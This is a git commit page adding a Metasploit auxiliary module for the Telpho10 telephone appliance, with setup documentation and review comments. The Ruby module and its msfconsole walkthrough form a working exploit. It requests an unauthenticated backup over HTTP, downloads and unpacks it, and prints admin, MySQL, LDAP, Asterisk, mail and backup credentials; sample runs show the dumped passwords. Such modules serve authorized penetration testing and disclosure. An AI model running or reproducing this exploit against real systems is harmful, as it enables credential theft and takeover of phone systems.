Land #7484, Add Telpho10 Credentials Dump Exploit

bug/bundler_fix
Pearce Barry 2016-10-28 17:41:46 -05:00
commit 5c12d55c84
No known key found for this signature in database
GPG Key ID: 0916F4DEA5C5DE0A
2 changed files with 291 additions and 0 deletions

View File

@ -0,0 +1,132 @@
## Vulnerable Application
Telpho10 v2.6.31 (32-bit Linux ISO image download [here](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso)).
Supporting documentation for this product can be found [here](http://www.telpho.de/downloads.php).
## Verification Steps
The following steps will allow you to install and dump the credentials from a Telpho10 instance:
1. Download the [Telpho10 ISO image](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso) and install in a VM (or on a system)
- note that the ISO will default to a German keyboard layout
1. configure the Telpho10's IP address
- edit /etc/networks/interfaces accordingly
1. Start msfconsole
1. Do: ```use auxiliary/admin/http/telpho10_credential_dump```
1. Do: ```set RHOST <IP address of your Telpho10 instance> ```
1. Do: ```run```
1. You should see a list of the retrieved Telpho10 credentials
## Scenarios
Example output when using this against a Telpho10 v2.6.31 VM:
```
$ ./msfconsole
# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v4.12.36-dev-16fc6c1 ]
+ -- --=[ 1596 exploits - 908 auxiliary - 273 post ]
+ -- --=[ 458 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use auxiliary/admin/http/telpho10_credential_dump
msf auxiliary(telpho10_credential_dump) > set RHOST 10.0.2.35
RHOST => 10.0.2.35
msf auxiliary(telpho10_credential_dump) > run
[*] Generating backup
[*] Downloading backup
[+] File saved in: /home/pbarry/.msf4/loot/20161028155202_default_10.0.2.35_telpho10.backup_185682.tar
[*] Dumping credentials
[*] Login (/telpho/login.php)
[*] -------------------------
[+] Username: admin
[+] Password: telpho
[*] MySQL (/phpmyadmin)
[*] -------------------
[+] Username: root
[+] Password: telpho
[*] LDAP (/phpldapadmin)
[*] --------------------
[+] Username: cn=admin,dc=localdomain
[+] Password: telpho
[*] Asterisk MI (port 5038)
[*] -----------------------
[+] Username: telpho
[+] Password: telpho
[*] Mail configuration
[*] ------------------
[+] Mailserver:
[+] Username:
[+] Password:
[+] Mail from:
[*] Online Backup
[*] -------------
[+] ID:
[+] Password:
[*] Auxiliary module execution completed
msf auxiliary(telpho10_credential_dump) >
```
I navigated my browser to the admin page of the UI and changed some of the password values, then ran the module again to verify I see the updated values:
```
msf auxiliary(telpho10_credential_dump) > run
[*] Generating backup
[*] Downloading backup
[+] File saved in: /home/pbarry/.msf4/loot/20161028161929_default_10.0.2.35_telpho10.backup_044262.tar
[*] Dumping credentials
[*] Login (/telpho/login.php)
[*] -------------------------
[+] Username: admin
[+] Password: s3cr3t
[*] MySQL (/phpmyadmin)
[*] -------------------
[+] Username: root
[+] Password: telpho
[*] LDAP (/phpldapadmin)
[*] --------------------
[+] Username: cn=admin,dc=localdomain
[+] Password: ldaps3cr3t
[*] Asterisk MI (port 5038)
[*] -----------------------
[+] Username: telpho
[+] Password: asterisks3cr3t
[*] Mail configuration
[*] ------------------
[+] Mailserver:
[+] Username:
[+] Password:
[+] Mail from:
[*] Online Backup
[*] -------------
[+] ID:
[+] Password:
[*] Auxiliary module execution completed
```
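Review bot: the path in verification step 2, `edit /etc/networks/interfaces accordingly`, looks like a typo for `/etc/network/interfaces` (the Debian-style interfaces file; `/etc/networks` is the network-name database), so a reader following the step literally edits the wrong file; please confirm the path against the appliance. Two smaller points in the same list: the step wording mixes capitalisation (`configure the Telpho10's IP address` beside `Start msfconsole`), and the inline commands use triple-backtick spans with a stray trailing space inside `set RHOST <IP address of your Telpho10 instance> `, where single backticks without the space render cleanly.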

View File

@ -0,0 +1,159 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rubygems/package'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Telpho10 Backup Credentials Dumper',
'Description' => %q{
This module exploits a vulnerability found in Telpho10 telephone system
appliance. This module generates a configuration backup of Telpho10,
downloads the file and dumps the credentials for admin login,
phpmyadmin, phpldapadmin, etc.
This module has been successfully tested on the appliance.
},
'Author' => 'Jan Rude', # Vulnerability Discovery and Metasploit Module
'License' => MSF_LICENSE,
'References' => ['URL', 'https://github.com/whoot/TelpOWN'],
'Platform' => 'linux',
'Targets' =>
[
['Telpho10 <= 2.6.31', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Sep 2 2016'))
register_options(
[
Opt::RPORT(80)
], self.class)
end
# Used for unpacking backup files
def untar(tarfile)
destination = tarfile.split('.tar').first
FileUtils.mkdir_p(destination)
File.open(tarfile, 'rb') do |file|
Gem::Package::TarReader.new(file) do |tar|
tar.each do |entry|
dest = File.join destination, entry.full_name
if entry.file?
File.open(dest, 'wb') do |f|
f.write(entry.read)
end
File.chmod(entry.header.mode, dest)
end
end
end
end
return destination
end
# search for credentials in backup file
def dump_creds(mysql_file)
file = File.new(mysql_file, 'r')
while (line = file.gets)
if line.include? 'adminusername'
config = [line]
end
end
file.close
print_status('Login (/telpho/login.php)')
print_status('-------------------------')
print_good("Username: #{config.first[/adminusername\',\'(.*?)\'/, 1]}")
print_good("Password: #{config.first[/adminpassword\',\'(.*?)\'/, 1]}\n")
print_status('MySQL (/phpmyadmin)')
print_status('-------------------')
print_good('Username: root')
print_good("Password: #{config.first[/dbpassword\',\'(.*?)\'/, 1]}\n")
print_status('LDAP (/phpldapadmin)')
print_status('--------------------')
print_good('Username: cn=admin,dc=localdomain')
print_good("Password: #{config.first[/ldappassword\',\'(.*?)\'/, 1]}\n")
print_status('Asterisk MI (port 5038)')
print_status('-----------------------')
print_good("Username: #{config.first[/manageruser\',\'(.*?)\'/, 1]}")
print_good("Password: #{config.first[/managersecret\',\'(.*?)\'/, 1]}\n")
print_status('Mail configuration')
print_status('------------------')
print_good("Mailserver: #{config.first[/ipsmarthost\',\'(.*?)\'/, 1]}")
print_good("Username: #{config.first[/mailusername\',\'(.*?)\'/, 1]}")
print_good("Password: #{config.first[/mailpassword\',\'(.*?)\'/, 1]}")
print_good("Mail from: #{config.first[/mailfrom\',\'(.*?)\'/, 1]}\n")
print_status('Online Backup')
print_status('-------------')
print_good("ID: #{config.first[/ftpbackupid\',\'(.*?)\'/, 1]}")
print_good("Password: #{config.first[/ftpbackuppw\',\'(.*?)\'/, 1]}\n")
end
def run
res = send_request_cgi({
'uri' => '/telpho/system/backup.php',
'method' => 'GET'
})
if res && res.code == 200
print_status('Generating backup')
sleep(1)
else
print_error("Could not find vulnerable script. Aborting.")
return nil
end
print_status('Downloading backup')
res = send_request_cgi({
'uri' => '/telpho/temp/telpho10.epb',
'method' => 'GET'
})
if res && res.code == 200
if res.body.to_s.bytesize == 0
print_error('0 bytes returned, file does not exist or is empty.')
return nil
end
path = store_loot(
'telpho10.backup',
'application/x-compressed',
datastore['RHOST'],
res.body,
'backup.tar'
)
print_good("File saved in: #{path}")
begin
extracted = untar("#{path}")
mysql = untar("#{extracted}/mysql.tar")
rescue
print_error('Could not unpack files.')
return nil
end
begin
print_status("Dumping credentials\n")
dump_creds("#{mysql}/mysql.epb")
rescue
print_error('Could not find credential file.')
return nil
end
else
print_error('Failed to download backup file.')
return nil
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Failed to connect")
return nil
end
end
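Review bot: `untar` writes to `File.join destination, entry.full_name` without checking that the result stays under `destination`, so an archive containing `../` entry names would write (and `File.chmod`) files outside the loot directory on the operator's own host; expand the joined path and skip any entry that does not begin with `File.expand_path(destination)`. In the same loop only `destination` is created with `mkdir_p`, so a file stored under a subdirectory inside the tar fails with ENOENT at `File.open(dest, 'wb')`; a `FileUtils.mkdir_p(File.dirname(dest))` before the open fixes that. In `dump_creds`, `config` is assigned only when a line contains `adminusername`, so on a backup without that line `config.first` raises NoMethodError, which the bare `rescue` in `run` reports as `Could not find credential file.`; initialise `config = nil`, return with an accurate message when nothing matched, and the `[line]`/`.first` wrapping can become a plain string. `'References' => ['URL', 'https://github.com/whoot/TelpOWN']` should be a list of pairs, `[['URL', 'https://github.com/whoot/TelpOWN']]`, which is the shape the framework parses. Finally, the module mixes in `Msf::Auxiliary::Report` but only prints the recovered credentials; recording them through `create_credential`/`create_credential_login` would make them available to the rest of the framework, and `'Targets'`, `'Platform'` and `'Privileged'` are exploit-module keys that an auxiliary module does not use.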